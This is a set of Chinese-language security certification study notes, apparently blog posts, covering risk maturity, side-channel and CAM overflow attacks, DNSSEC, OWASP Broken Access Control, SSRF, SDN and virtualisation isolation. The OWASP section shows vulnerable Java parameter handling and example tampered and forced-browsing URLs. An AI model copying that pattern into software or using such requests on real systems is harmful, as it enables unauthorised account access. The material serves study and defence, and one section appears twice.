每個屬性都包括一組能力驅動因素,其中概述了實現每個驅動因素所涉及的關鍵準備指標(或活動)。這些驅動因素/指標對涵蓋整個風險管理流程,包括管理、外展、數據收集和匯總以及風險信息分析。以下是構成 RMM 風險成熟度評估的 25 個能力驅動因素和指標配對的樣本:

執行 ERM 支持

  • 風險優先級和進展是否向董事會或高級領導層報告?
  • 新計劃(即項目、運營變更、供應商入職等)是否需要進行風險評估?
  • 在員工績效評估中是否考慮了風險管理教育和理解?

信息分類

  • 是否有用於識別風險的標準化流程或分類模型?
  • 業務領域是否確定組織目標並跟踪實現進度?
  • 風險是通過根本原因還是源頭來識別的?

業務流程定義和風險所有權

  • 業務領域是否識別與流程相關的風險?
  • 流程所有者是否在定期規劃和戰略制定中管理他們的風險、威脅和機會?
  • 所有的風險、威脅和機遇是否都及時傳達並採取了行動?

評分方法

對於以下三個評估維度中的每一個,所有能力驅動因素都按照 1-10 的等級進行評分:

  • 效力衡量關鍵風險管理活動的頻率和有效性。(即評估是臨時的還是每年完成?是否至少每季度審查一次高風險?)
  • 主動性衡量風險管理的性質,無論是主動還是被動。(即組織是否等到不利事件發生以降低風險或是否計劃了未來的情景?)
  • 覆蓋範圍衡量組織內風險管理的廣度和深度。(即職責是否跨越組織的所有部門和所有垂直級別?)

完成後,將為每個驅動程序提供成熟度評分以及整個風險管理計劃的整體成熟度評分。評分基於 5 級量表,1 級表示最低風險成熟度,5 級表示最高成熟度。通過每個因素的成熟度評分,組織可以優先考慮時間和資源來改進其風險管理流程中最薄弱的領域,同時保留最強大的實踐。

基於經過驗證的最佳實踐活動,實施 RMM 指標的組織能夠創造並體驗有效風險管理的好處。LogicManager 幫助組織彌合差距並完善其風險管理計劃,提供了許多資源和幫助方法。

如何進行 RMM 風險成熟度評估

通常,組織在完成 RMM 的風險管理成熟度評估時會採取兩條路線:一個人代表 ERM 計劃(風險管理計劃和實踐的核心人員)完成評估,或者由幾個人進行評估並彙總分數來自參與 ERM 計劃不同領域的多個評估員。

RMM 有兩個版本:標準版本旨在供組織中希望全面了解其 ERM 成熟度的領導者採用。第二個版本,即前線的 RMM,旨在供員工直接執行為組織提供動力的日常運營和流程。標準 RMM 和前線 RMM 之間的區別在於能力驅動因素(前者將被問及關於更高級別企業關注的問題,而後者將檢查與它們更密切相關的領域)。雖然根據每個 ERM 計劃的結構,一種方法可能比另一種更適合,但兩者都會產生有意義的成熟度分數和報告,以便在改進 ERM 計劃時加以利用。

要進行免費的在線 RMM 評估,請訪問此鏈接完成後,評估會提供一份個性化的分數報告,包括您的報告與成功因素指南之間的比較。這有助於您識別差距並確定其優先級,並製定行動計劃以推進您的風險管理計劃。評估不需要任何經驗,大約需要 30 分鐘才能完成,並通過易於使用的在線評估嚮導完成。單擊此處進行 RMM 評估

如果您對 RMM 評估有任何疑問或想召開會議討論您的結果,請發送電子郵件至communications@logicmanager.com。

資料來源:https://www.riskmaturitymodel.org/risk-maturity-model-rmm-for-erm/

分類
CISSP

最有可能導致數據洩露的針對智能卡(smart cards)的攻擊

https://ithelp.ithome.com.tw/upload/images/20210925/201321603Nk48YiIrz.jpg
-側信道攻擊

側信道攻擊(Side-channel attack)
只需在設備或系統附近放置天線、磁探頭或其他傳感器,即可利用側信道。這允許攻擊者測量功耗、電壓波動或其他側信道,例如溫度或聲音。側信道攻擊可用於從智能卡等設備中提取密鑰。在現實世界中,這允許攻擊者加載或重置餘額並提取或重置設備 PIN。(半工程)
通過從物理密碼系統洩漏信息而啟用的攻擊。可以在側信道攻擊中利用的特徵包括時間、功耗以及電磁和聲發射。
來源:NIST 術語表
在 計算機安全中, 旁道攻擊 是基於從 計算機系統的實施中獲得的信息的任何攻擊 ,而不是實施算法本身的弱點(例如 密碼分析 和 軟體錯誤)。時間信息、功耗、 電磁 洩漏甚至 聲音 都可以提供額外的信息來源,可以加以利用。
資料來源:維基百科

內容可尋址內存 (CAM) 表溢出攻擊(Content addressable memory (CAM) table overflow attack)
當 CAM 表溢出時,交換集線器可能會降級為集線器以通過向所有端口發送幀來保持可用性。這會導致中間人惡意嗅探。
CAM 表溢出攻擊是針對網絡交換機執行的惡意行為,其中大量虛假 MAC 地址被發送到交換機。這種數據洪流導致交換機轉儲其 CAM 數據庫表中的有效地址,以試圖為虛假信息騰出空間。在這之後,交換機的默認行為是向所有端口廣播正常的私有消息。
資料來源:CbtNuggets

竊聽攻擊(Wiretapping Attack)
竊聽是對電話、電報、蜂窩、 傳真 或基於互聯網的通信進行的秘密電子監控 。
竊聽是通過在有問題的線路上放置一個非正式地稱為錯誤的監視設備或通過其他通信技術中的內置機制來實現的。
執法官員可以利用現場監控或錄音。數據包嗅探器——用於捕獲在網絡上傳輸的數據的程序——是一種常用的現代竊聽工具。各種其他工具,例如竊聽木馬,用於不同的應用程序。
資料來源:TechTarget

背負式攻擊(Piggyback attack)
一個 背馱式攻擊 是一種活化形式 竊聽 當攻擊者獲得通過活動的間隔訪問系統中的其他用戶的合法連接。它也被稱為“線間攻擊”或“背負式進入竊聽”。
在安全方面,捎帶指的是當某人與另一個被授權進入限制區域的人一起標記時,該術語 在此上下文中適用於 計算機網路
資料來源:維基百科

參考
了解側信道攻擊
ARP 和 CAM 表
背負式攻擊
保護圖片存檔和通信系統 (PACS):醫療保健行業的網絡安全

資料來源: Wentz Wu QOTD-20210811

分類
CISSP

區塊加密法工作模式

密碼學中,區塊密碼工作模式(mode of operation)允許使用同一個區塊密碼密鑰對多於一塊的資料進行加密,並保證其安全性。[1][2] 區塊密碼自身只能加密長度等於密碼區塊長度的單塊資料,若要加密變長資料,則資料必須先被劃分為一些單獨的密碼塊。通常而言,最後一塊資料也需要使用合適填充方式將資料擴充到符合密碼塊大小的長度。一種工作模式描述了加密每一資料塊的過程,並常常使用基於一個通常稱為初始化向量的附加輸入值以進行隨機化,以保證安全[1]

工作模式主要用來進行加密和認證[1][3] 對加密模式的研究曾經包含資料的完整性保護,即在某些資料被修改後的情況下密碼的誤差傳播特性。後來的研究則將完整性保護作為另一個完全不同的,與加密無關的密碼學目標。部分現代的工作模式用有效的方法將加密和認證結合起來,稱為認證加密模式[2]

雖然工作模式通常應用於對稱加密[2],它亦可以應用於公鑰加密,例如在原理上對RSA進行處理,但在實用中,公鑰密碼學通常不用於加密較長的資訊,而是使用結合對稱加密和公鑰加密的混合加密方案[1]

資料來源:https://zh.wikipedia.org/wiki/%E5%88%86%E7%BB%84%E5%AF%86%E7%A0%81%E5%B7%A5%E4%BD%9C%E6%A8%A1%E5%BC%8F

分類
CISSP

DNS 服務器之間的區域傳輸(Zone transfer)

https://ithelp.ithome.com.tw/upload/images/20210922/20132160vQfp8cj6DA.jpg
-防火牆接口和區域
防火牆通常以兩種方式調解網絡流量:基於上下文和基於區域。傳統的基於上下文的方法也稱為基於上下文的訪問控制 (CBAC)。

基於區域的防火牆(Zone-based Firewalls)
防火牆包含幾個網絡接口,可以配置或分配給區域。安全區域或簡稱區域是共享相同安全要求的防火牆接口的集合。區域之間的流量由防火牆策略控制。有關更多信息,請參閱防火牆接口、區域和層

區域對(Zone Pairs)
區域對可以定義為一個方向上兩個區域的配對。然後將防火牆流量策略應用於區域對。防火牆流量策略在區域之間單向應用。雙向流量需要兩個區域對。但是,如果使用狀態檢查,則不需要第二個區域對,因為由於檢查而允許回复流量。
資料來源:OmniSecu

基於上下文的防火牆(Context-based Firewalls)
所述的ACL提供流量過濾和保護,直到傳輸層,同時在另一方面,CBAC提供高達應用層相同的功能。在 CBAC 配置的幫助下,路由器可以充當防火牆。
資料來源:GeeksForGeeks

基於上下文的訪問控制 (CBAC) 根據應用層協議會話信息智能過濾 TCP 和 UDP 數據包,可用於 Intranet、Extranet 和 Internet。
資料來源:黑羊網絡(BlackSheepNetworks)

Cisco IOS® 防火牆功能集的基於上下文的訪問控制 (CBAC) 功能會主動檢查防火牆後面的活動。CBAC 通過使用訪問列表(與 Cisco IOS 使用訪問列表的方式相同)指定需要允許進入的流量以及需要釋放的流量。但是,CBAC 訪問列表包括 ip inspect 語句,允許檢查協議以確保在協議進入防火牆後面的系統之前它沒有被篡改。
資料來源:思科

DNS 區域(DNS Zones)
DNS 命名空間是按層次結構或樹組織的 DNS 域名的邏輯結構。DNS 區域是 DNS 命名空間的一部分的管理結構。DNS 區域文件是區域的存儲庫。
主 DNS 服務器託管一個可寫區域,該區域可以傳輸到一個或多個輔助 DNS 服務器。輔助 DNS 服務器上的副本或副本通常是只讀的。但是,副本可以是可寫的,例如 Microsoft AD 集成的 DNS;這取決於供應商的實施。
主 DNS 服務器和輔助 DNS 服務器之間的區域傳輸使用 TCP 端口 53。它可以定期或基於通知進行。為了安全起見,主 DNS 服務器可能會維護一個輔助 DNS 服務器的白名單。
DNS 客戶端也稱為 DNS 解析器,它使用 UDP 端口 53 向 DNS 服務器發送遞歸 DNS 查詢。然後 DNS 服務器發出多個非遞歸或迭代查詢來解決來自 DNS 客戶端的查詢。
https://ithelp.ithome.com.tw/upload/images/20210922/20132160jEy54XJ5Zp.jpg
-DNS 命名空間和區域

參考
域名系統(維基百科)
DNS區域傳輸
DNSSEC – 它是什麼以及為什麼重要?
基於區域的防火牆基礎知識
網絡安全區
使用區域(紅帽)
區域對
基於上下文的訪問控制
基於上下文的訪問控制 (CBAC)
Cisco IOS 防火牆功能集和基於上下文的訪問控制
基於上下文的訪問控制 (LDAPWiki)

資料來源:Wentz Wu QOTD-20210810

分類
CISA

SMART原則

SMART原則目標管理中的一種方法。目標管理的任務是有效地進行成員的組織與目標的制定和控制以達到更好的工作績效,由管理學大師彼得·杜拉克於1954年首先提出。SMART原則便是為了達到這一目的而提出的一種方法,目前在企業界有廣泛的應用。它的首次出現被認為是在1981年12月發行的《管理評論》(Management Review)上(由George Doran、Arthur Miller和James Cunningham編著)。[1]

SMART原則中的「S」、「M」、「A」、「R」、「T」五個字母分別對應了五個英文單詞:Specific(明確)、Measurable(可衡量)、Achievable(可達成)、Relevant(相關)和Time-bound(有時限)。

資料來源:https://zh.wikipedia.org/wiki/SMART%E5%8E%9F%E5%88%99

分類
CISSP

資產生命週期(Asset Lifesysle)

分類
CISSP

DNS 安全擴展 (DNSSEC)

https://ithelp.ithome.com.tw/upload/images/20210915/20132160uMqakJgDrS.jpg
-DNSSEC 資源記錄(來源:InfoBlox
DNSSEC使用數字簽名確保DNS 數據的完整性,而 DNS over HTTPS (DoH) 或 DNS over TLS (DoT) 保護機密性。
以下是一些最重要的 DNSSEC 資源記錄 (RR):
. DS(委託簽名者)
. DNSKEY(DNS 公鑰)
. RRSIG(資源記錄簽名)
https://ithelp.ithome.com.tw/upload/images/20210915/201321608gOmwhiDvP.png
DS(委託簽名者)
DS RR 包含子區域 KSK 的哈希值,可用作某些具有安全意識的解析器中的信任錨,並為 DNS 服務器中的簽名子區域創建安全委派點。如圖 22.1 所示,父區域 corpxyz.com 中的 DS RR 包含子區域 sales.corpxyz.com 的 KSK 的哈希值,而子區域 sales.corpxyz.com 的 DS 記錄又包含其子區域的 KSK 的哈希值, nw.sales.corpxyz.com。
-資料來源:InfoBlox

DNSKEY(DNS 公鑰)
當權威名稱服務器對區域進行數字簽名時,它通常會生成兩個密鑰對,一個區域簽名密鑰 (ZSK) 對和一個密鑰簽名密鑰 (KSK) 對。
名稱服務器使用ZSK 對的私鑰對區域中的每個 RRset 進行簽名。(RRset 是一組具有相同所有者、類別和類型的資源記錄。)它將 ZSK 對的公鑰存儲在 DNSKEY 記錄中。
然後名稱服務器使用KSK 對的私鑰對所有 DNSKEY 記錄進行簽名,包括它自己的記錄,並將相應的公鑰存儲在另一個 DNSKEY 記錄中。
因此,一個區域通常有兩個 DNSKEY 記錄;保存 ZSK 對公鑰的 DNSKEY 記錄,以及 KSK 對公鑰的另一個 DNSKEY 記錄。
資料來源:InfoBlox

R RSIG(資源記錄簽名)
一個簽名區域有多個 RRset,每個記錄類型和所有者名稱一個。(所有者是RRset 的域名。)當權威名稱服務器使用ZSK 對的私鑰對區域中的每個RRset 進行簽名時,每個RRset 上的數字簽名都存儲在RRSIG 記錄中。因此,簽名區域包含每個 RRset 的 RRSIG 記錄。
資料來源:InfoBlox

參考
DNSSEC – 回顧
DNSSEC – 它是什麼以及為什麼重要?
域名系統安全擴展
DNSSEC 的工作原理
DNSSEC:它的工作原理和主要考慮因素
RFC 4033:DNS 安全介紹和要求
RFC 4034:DNS 安全擴展的資源記錄
RFC 4035:DNS 安全擴展的協議修改
基於 HTTPS 的 DNS
如何配置 DoT/DoH
DNSKEY 資源記錄

資料來源: Wentz Wu QOTD-20210809

分類
CISSP

Risk Treatment

分類
CISSP

系統和應用軟體提供安全保證- 通用標準(Common Criteria)

https://ithelp.ithome.com.tw/upload/images/20210913/20132160wBxk3wtKD2.jpg
-通用標準評估
TCSEC 在 DoD 中用於評估受信任的計算機系統。它適用於整個計算機系統,而不適用於特定的軟體組件。此外,它已經過時了。
可信計算機系統評估標準 ( TCSEC ) 是 美國政府國防部 (DoD) 標準,它為評估 內置於計算機系統中的計算機安全控制 的有效性設定了基本要求 。TCSEC 用於評估、分類和選擇被考慮用於處理、存儲和檢索敏感或機密資訊的計算機系統 。(維基百科
CMMI 是一種基於過程的模型,用於評估組織在軟體開發、採購或服務交付方面的能力成熟度。它不適用於軟體本身。
SOC 2 Type II 是關於服務組織中與安全性、可用性、處理完整性、機密性或隱私相關的控制的報告。這些報告旨在滿足廣大用戶的需求,這些用戶需要有關服務組織用於處理用戶數據和服務的系統的安全性、可用性和處理完整性相關的控制的詳細信息和保證。這些系統處理的信息的機密性和隱私性。(AICPA)

參考
批准的保護配置文件
認證產品
Windows 10:內部版本 10.0.15063(也稱為版本 1703)

資料來源: Wentz Wu QOTD-20210808

分類
Information Security

OWASP Top 10-A01:2021 – 權限控制失效

A01:2021 – 權限控制失效

對照因素

可對照 CWEs 數量最大發生率平均發生率最大覆蓋範圍平均覆蓋範圍平均加權弱點平均加權影響出現次數所有相關 CVEs 數量
3455.97%3.81%94.55%47.72%6.925.93318,48719,013

概述

從第五名晋升至第一名,94% 的應用程式都對中斷的存取控制進行了某種形式的測試。著名 的 CWE 包括 CWE-200:將敏感資訊暴露給未經授權的演員CWE-201:通過發送資料 和 CWE-352暴露敏感資訊:跨站請求偽造

描述

存取控制強化政策,使得用戶不能採取在預期權限之外的行動。故障通常會導致未經授權 的資訊洩露、修改或破壞所有資料,或執行超出用戶限制的業務功能。 常見的存取控制弱點包括:

  • 通過修改URL、內部應用程式狀態或HTML頁面,或僅使用自定義API攻擊工具來繞過存取控制檢查。
  • 容許主鍵被更改為其他用戶的記錄,允許查看或編輯其他人的帳戶。
  • 特權提升。未登入即成為用戶,或以用戶身份登入即成為管理員。
  • 中繼資料操作,例如重放或篡改JSON網站令牌(JWT)之存取控制令牌,或被操縱以提升特權或濫用 JWT失效的cookie或隱藏欄位。
  • CORS錯誤配置允許未經授權的API存取。
  • 以未經身份驗證的用戶身份強制瀏覽已驗證的頁面或以標準用戶身份存取特權頁面。 存取缺少存取控制的API以進行POST、PUT 和 DELETE操作。

如何預防

存取控制僅在受信任的伺服器端代碼或無伺服器的API有效果,攻擊者無法修改這裏的存取控制檢查或中繼資料。

  • 除公開資源外,以拒絕為預設值。
  • 一次性地建置存取控制機制,之後在整個應用程式中重複使用它們,包括最大限度地減少使用CORS。
  • 模型的存取控制措施應該強化記錄所有權,而不是讓用戶可以創建、讀取、更新或刪除任何記錄。
  • 獨特的應用程式業務限制要求應由領域模型予以強化。
  • 停用Web伺服器目錄列表,並確保檔案中繼資料(例如,.git)和備份檔案不在web根目錄中。
  • 記錄存取控制失效,並在適當的時間警示管理員(例如,重覆性失效)。
  • 對API和控制器存取進行流量限制,以最小化自動攻擊工具所帶來的損害。
  • JWT令牌於登出後,在伺服器端應使其失效。

開發人員和QA品保人員應納入與功能有關之存取控制的單元和整合測試。

攻擊情境範例

情境 #1: 應用程式在存取帳戶資訊的SQL呼叫中使用未經驗證的資料:

pstmt.setString(1, request.getParameter(“acct”));

ResultSet results = pstmt.executeQuery( );

攻擊者只需修改瀏覽器的“acct”參數即可發送他們想要的任何帳號。如果沒有正確驗證, 攻擊者可以存取任何用戶的帳戶。

https://example.com/app/accountInfo?acct=notmyacct

情境#2: 攻擊者僅強迫瀏覽某些目標網址。存取管理頁面需要管理員權限。

https://example.com/app/getappInfo

https://example.com/app/admin_getappInfo

如果未經身份驗證的用戶可以存取任一頁面,那就是一個缺陷。 如果一個非管理員可以存取管理頁面,這也是一個缺陷。

參考

對應的CWE列表

CWE-22 不當限制受限目錄的路徑名稱(路徑遍訪)

CWE-23 相對路徑遍訪

CWE-35 路徑遍訪: ‘…/…//’

CWE-59 檔案存取前不當的路徑解析 (‘連結指向’)

CWE-200 將敏感資訊曝露給未經授權的行為者

CWE-201 經由發送的資料曝露敏感資訊

CWE-219 在網站根目錄下存放敏感資料

CWE-264 權限、特權和存取控制(不應再使用)

CWE-275 權限問題

CWE-276 不正確的預設權限

CWE-284 不當的存取控制

CWE-285 不當的授權

CWE-352 跨站請求偽造 (CSRF)

CWE-359 將私有的個人資訊曝露給未經授權的行為者

CWE-377 不安全的暫存檔案

CWE-402 私有資源輸入新領域(“資源洩漏”)

CWE-425 直接請求(“強制瀏覽”)

CWE-441 意外代理或中介(“困惑的代理”)

CWE-497 將敏感系統資訊曝露給未經授權的控制領域

CWE-538 將敏感資訊插入外部可存取的檔案或目錄

CWE-540 原始程式中包含敏感資訊

CWE-548 透過列示目錄而曝露資訊

CWE-552 外部各方可存取的檔案或目錄

CWE-566 通過用戶控制的 SQL 主鍵繞過授權

CWE-601 URL重新導向至不受信任的站台(“開放而不受限的重新導向”)

CWE-639 通過用戶控制的金鑰繞過授權

CWE-651 曝露包含敏感資訊的WSDL檔案

CWE-668 資源曝露於錯誤領域

CWE-706 使用被不正確解析的名稱或參考

CWE-862 缺少授權

CWE-863 不正確的授權

CWE-913 不當的動態管理的代碼資源控制

CWE-922 不安全儲存的敏感資訊

CWE-1275 具有不當SameSite屬性設定的敏感Cookie

資料來源:https://github.com/ninedter/Top10/blob/2021-zhtw/2021/docs/A01_2021-Broken_Access_Control.zh_TW.md

分類
CISSP

DevOps

DevOpsDevelopment和Operations的組合詞)是一種重視「軟體開發人員(Dev)」和「IT運維技術人員(Ops)」之間溝通合作的文化、運動或慣例。透過自動化「軟體交付」和「架構變更」的流程,來使得構建、測試、發布軟體能夠更加地快捷、頻繁和可靠。

傳統的軟體組織將開發、IT運維和品質保障設為各自分離的部門,在這種環境下如何採用新的開發方法(例如敏捷軟體開發),是一個重要的課題。按照從前的工作方式,開發和部署,不需要IT支援或者QA深入的跨部門的支援;而現在卻需要極其緊密的多部門協同運作。而DevOps考慮的還不止是軟體部署,它是一套針對這幾個部門間溝通與協同運作問題的流程和方法。[5]

資料來源:https://zh.wikipedia.org/wiki/DevOps

分類
Information Security

伺服器端請求偽造

在電腦安全中,伺服器端請求偽造(英語:Server-side Request Forgery,簡稱SSRF)是攻擊者濫用伺服器功能來存取或操作無法被直接存取的資訊的方式之一。[1]

伺服器端請求偽造攻擊將域中的不安全伺服器作為代理使用,這與利用網頁客戶端跨站請求偽造攻擊類似(如處在域中的瀏覽器可作為攻擊者的代理)。

資料來源:https://zh.wikipedia.org/wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0

分類
CISSP

OpenFlow

OpenFlow,一種網路通訊協定,屬於數據鏈路層,能夠控制網路交換器路由器轉發平面(forwarding plane),藉此改變網路封包所走的網路路徑。

OpenFlow(OF)被認為是第一個軟體定義網路(SDN)標準之一。它最初在SDN環境中定義了通信協定,使SDN控制器能夠與物理和虛擬的交換機和路由器等網路裝置的轉發平面直接進行互動,從而更好地適應不斷變化的業務需求。

SDN中的SDN控制器是SDN網路的「大腦」,它將資訊傳遞給交換機/路由器的「下方」(通過南向API)和「上方」(通過北向API)的應用和業務邏輯。最近,隨著組織部署更多的SDN網路,SDN控制器的任務是使用通用應用程式介面(如OpenFlow和開放式虛擬交換機資料庫(OVSDB))在SDN控制器域之間進行聯合。

要在OF環境中工作,任何想要與SDN控制器通信的裝置都必須支援OpenFlow協定。通過這個介面,SDN控制器將更改推播到交換機/路由器流量表,使網路管理員能夠對流量進行分割區,控制流量以獲得最佳效能,並開始測試新組態和應用。

資料來源:https://zh.wikipedia.org/wiki/OpenFlow

分類
CISSP

軟體定義網路(software-defined networking:SDN

軟體定義網路(英語:software-defined networking,縮寫作 SDN)是一種新型網路架構。它利用OpenFlow協定將路由器控制平面(control plane)從資料平面(data plane)中分離,改以軟體方式實作,從而使得將分散在各個網路裝置上的控制平面進行集中化管理成為可能 ,該架構可使網路管理員在不更動硬體裝置的前提下,以中央控制方式用程式重新規劃網路,為控制網路流量提供了新方案,也為核心網路和應用創新提供了良好平台。SDN可以按使用領域分為:SD-WAN, SD-LAN, SD-DC, SDN將人工智慧引入到網路系統里來,將是未來幾年最熱門的網路前沿技術之一。[1]

FacebookGoogle都在他們的資料中心中使用OpenFlow協定,並成立了開放網路基金會來推動這個技術。[2][3]

資料來源:https://zh.wikipedia.org/wiki/%E8%BB%9F%E9%AB%94%E5%AE%9A%E7%BE%A9%E7%B6%B2%E8%B7%AF

分類
CISSP

最高級別的隔離- 第二類類虛擬機器監視器( Type II hypervisor)

https://ithelp.ithome.com.tw/upload/images/20210902/20132160rDpjQho9k7.jpg
-軟體運行環境

與共享資源隔離(Isolation from Sharing Resources)
隔離是“將多個軟體實例分開的能力,以便每個實例只能看到並影響自己。”
資料來源:NIST SP 800-190
進程使用各種資源,例如 CPU、記憶體、儲存、網路、操作系統服務等。為了隔離進程,使其不會影響其他進程,需要控制對記憶體和其他資源的存取。
https://ithelp.ithome.com.tw/upload/images/20210902/20132160g0pXGLvyBI.jpg
-計算機架構

界限(Bounds)
這裡的界限意味著強加給進程的記憶體界限,不能存取屬於其他人的記憶體段。它提供了基本的隔離級別。共享儲存、CPU、網絡和其他資源的進程可能仍會導致競爭資源競爭。
https://ithelp.ithome.com.tw/upload/images/20210902/20132160x2crcn8PMs.jpg
-進程的記憶體佈局

容器化(Containerization)
容器化是應用程序虛擬化,其中容器中的進程與大多數資源隔離,但仍共享相同的操作系統內核。
https://ithelp.ithome.com.tw/upload/images/20210902/20132160FAbec7eqTa.png
-虛擬機和容器部署(來源:NIST SP 800-190)
https://ithelp.ithome.com.tw/upload/images/20210902/20132160otolPovczM.jpg
-操作系統和應用程序虛擬化(來源:NIST SP 800-190)

第二類虛擬機器監視器(Type II hypervisor)
一個第二類虛擬機器監視器基於主機操作系統上管理虛擬機(VM)上運行的客戶操作系統。在具有來賓操作系統的 VM 上運行的進程是高度隔離的。部署在兩個 VM 上的兩個進程具有比容器更高的隔離級別。
https://ithelp.ithome.com.tw/upload/images/20210902/20132160xhmrFAlSxb.png
-虛擬機器監視器(來源:TechPlayOn

搶占式多任務處理(Preemptive Multitasking)
搶占式多任務處理不是一種隔離機制。但是,它通常需要上下文切換來保留線程的 CPU 狀態。從這個角度來看,它可以在某種程度上被視為線程級隔離。
https://ithelp.ithome.com.tw/upload/images/20210902/201321605Lo3q56oKv.jpg
-上下文切換(來源:hcldoc)

參考
什麼是雲中的管理程序?
上下文切換

資料來源: Wentz Wu QOTD-20210803

分類
CISSP

保護環0-處理故障

https://ithelp.ithome.com.tw/upload/images/20210901/201321603bcsjROKk3.png
-保護環(來源:維基百科)

保護環:指令特權級別和操作系統模式(Protection Rings: Instruction Privilege Levels and OS modes)
大多數現代操作系統以兩種模式運行程序:內核模式和用戶模式。內核模式通常運行在特權級別 0,而用戶模式運行在特權級別 3。保護環傳達了操作系統如何利用指令集的 CPU 特權級別的想法。
x86指令集中的特權級別控制當前在處理器上運行的程序對內存區域、I/O 端口和特殊指令等資源的訪問。有 4 個特權級別,從 0 是最高特權,到 3 是最低特權。大多數現代操作系統對內核/執行程序使用級別 0,對應用程序使用級別 3。任何可用於級別 n 的資源也可用於級別 0 到 n,因此權限級別是環。當較低特權的進程嘗試訪問較高特權的進程時,會向操作系統報告一般保護錯誤異常。
資料來源:維基百科

異常處理(Exception Handling)
https://ithelp.ithome.com.tw/upload/images/20210901/20132160hSxqbEpcQ4.jpg
-異常處理(來源:https : //minnie.tuhs.org/)
操作系統 (OS) 內核通常處理來自進程的系統調用、來自 CPU 的異常以及來自外圍設備的中斷。在用戶模式下運行的應用程序或進程可能會遇到錯誤或故障,導致在內核模式下運行的操作系統內核捕獲到 CPU 級別的異常。如果發生故障,操作系統內核將拋出異常或向應用程序發送信號。以下屏幕截圖是演示應用程序正確處理異常的代碼片段。但是,如果應用程序不處理異常,操作系統將終止它。
https://ithelp.ithome.com.tw/upload/images/20210901/201321607ZayXG6l5o.jpg
-除以零

參考
保護環
操作系統中的特權和非特權指令
CIS 3207 – 操作系統:CPU 模式
編寫 Hello World Windows 驅動程序 (KMDF)
如何使用 C++ 以 SYSTEM 身份運行程序?
除以零預防:陷阱、異常和可移植性
用戶和內核模式、系統調用、I/O、異常

資料來源: Wentz Wu QOTD-20210802

分類
CISSP

IPSec Protocols and Modes

資料來源:https://wentzwu.com/2021/06/15/cissp-practice-questions-20210615/

分類
CEH

殺傷鏈

殺傷鏈在軍事上指的是一種攻擊過程,具體是指識別所要打擊的目標、向目標派遣兵力、決定並下令攻擊目標、最後摧毀目標等一系列攻擊過程[1]。而洛克希德·馬丁公司將這一攻擊過程引入信息安全領域,假想實施計算機網絡入侵的黑客也會採取這種攻擊過程,並將其稱之為網絡殺傷鏈模型[2]。網絡殺傷鏈模型在信息安全界得到了一定的採用[3]。然而,這一模型並沒有得到普遍接受,批評者認為這一模型存在根本性的缺陷[4]

資料來源:https://zh.wikipedia.org/wiki/%E6%AE%BA%E5%82%B7%E9%8F%88

分類
CISSP

容器化及容器技術(containerization and container technology)

https://ithelp.ithome.com.tw/upload/images/20210828/20132160n6stU1nVeH.png
-虛擬機和容器部署(來源:NIST SP 800-190)

虛擬機器監視器(Hypervisor)
容器不需要管理程序來支持應用程序虛擬化。容器可以部署到裸機,無需虛擬機管理程序管理的虛擬機。虛擬機器監視器又名虛擬機監視器/管理器 (VMM),是“管理主機上的來賓操作系統並控制來賓操作系統和物理硬件之間的指令流的虛擬化組件。” ( NIST SP 800-125 )

隔離(Isolation)
虛擬機提供比容器更高級別的隔離。應用程序部署在共享相同主機操作系統內核的容器中,而部署在虛擬機上的應用程序被高度隔離,因此它們必須通過網絡進行通信。但是,容器中的應用程序比虛擬機中的應用程序具有更好的性能。
-操作系統和應用程序虛擬化(來源:NIST SP 800-190)

操作系統系列特定(OS-family Specific)
使用容器,多個應用程序共享同一個操作系統內核實例,但彼此隔離。操作系統內核是所謂的主機操作系統的一部分。主機操作系統位於容器下方,並為它們提供操作系統功能。容器是特定於操作系統系列的;Linux 主機只能運行為 Linux 構建的容器,Windows 主機只能運行 Windows 容器。此外,為一個操作系統系列構建的容器應該在該系列的任何最新操作系統上運行。
來源:NIST SP 800-190(應用程序容器安全指南)

軟體開發方法(Software Development Methodologies)
https://ithelp.ithome.com.tw/upload/images/20210828/20132160x4LIcG3p38.jpg
-容器技術架構(來源:NIST SP 800-190)

容器技術的引入可能會破壞組織內現有的文化和軟體開發方法。傳統的開發實踐、修補技術和系統升級過程可能無法直接應用於容器化環境,員工願意適應新模式很重要。應鼓勵員工採用本指南中介紹的在容器內安全構建和運行應用程序的推薦做法,並且組織應願意重新考慮現有程序以利用容器。應向參與軟體開發生命週期的任何人提供涵蓋技術和操作方法的教育和培訓。
https://ithelp.ithome.com.tw/upload/images/20210828/20132160WUO3opPsJK.jpg
-來源:NIST SP 800-190(應用程序容器安全指南)

參考
Windows Containers 可以託管在 linux 上嗎?

資料來源: Wentz Wu QOTD-20210717

分類
CISSP

什麼是工程?

圖片來源:加斯托尼亞市

工程 是一種方法,它涉及應用知識和技能來理解和管理利益相關者的需求、提出和實施解決這些需求的解決方案,以及利用和支持該解決方案以持續創造價值直到其退休為止的一系列過程。
~ 吳文智

系統工程

跨學科的方法,管理將一組利益相關者的需求、期望和限制轉化為解決方案並在其整個生命週期中支持該解決方案所需的全部技術和管理工作。

來源:ISO/IEC/IEEE 15288:2015 系統和軟件工程——系統生命週期過程

軟件工程

將系統的、規範的、可量化的方法應用於軟件的開發、操作和維護;也就是說,工程在軟件中的應用。

來源:ISO/IEC/IEEE 12207:2017 系統和軟件工程——軟件生命週期過程

資料來源:

圖片來源:加斯托尼亞市

工程 是一種方法,它涉及應用知識和技能來理解和管理利益相關者的需求、提出和實施解決這些需求的解決方案,以及利用和支持該解決方案以持續創造價值直到其退休為止的一系列過程。
~ 吳文茲

系統工程

跨學科的方法,管理將一組利益相關者的需求、期望和限制轉化為解決方案並在其整個生命週期中支持該解決方案所需的全部技術和管理工作。

來源:ISO/IEC/IEEE 15288:2015 系統和軟件工程——系統生命週期過程

軟件工程

將系統的、規範的、可量化的方法應用於軟件的開發、操作和維護;也就是說,工程在軟件中的應用。

來源:ISO/IEC/IEEE 12207:2017 系統和軟件工程——軟件生命週期過程

資料來源:https://wentzwu.com/2020/12/30/what-is-engineering/

分類
CISSP

在軟體開發項目中使用開源組件,最不關心的是測試覆蓋率

https://ithelp.ithome.com.tw/upload/images/20210827/20132160lgznjc4j3z.png
-流行的 F/LOSS 許可證之間的兼容性關係(來源:Carlo Daffara)
在評估開源組件時,通常會忽略測試覆蓋率。相反,下載量或口碑起著至關重要的作用。儘管開源項目通常帶有單元測試,但測試覆蓋率指標並不是標準。

知識產權(Intellectual property)
開源軟體不屬於公共領域。它仍然由版權所有者許可。
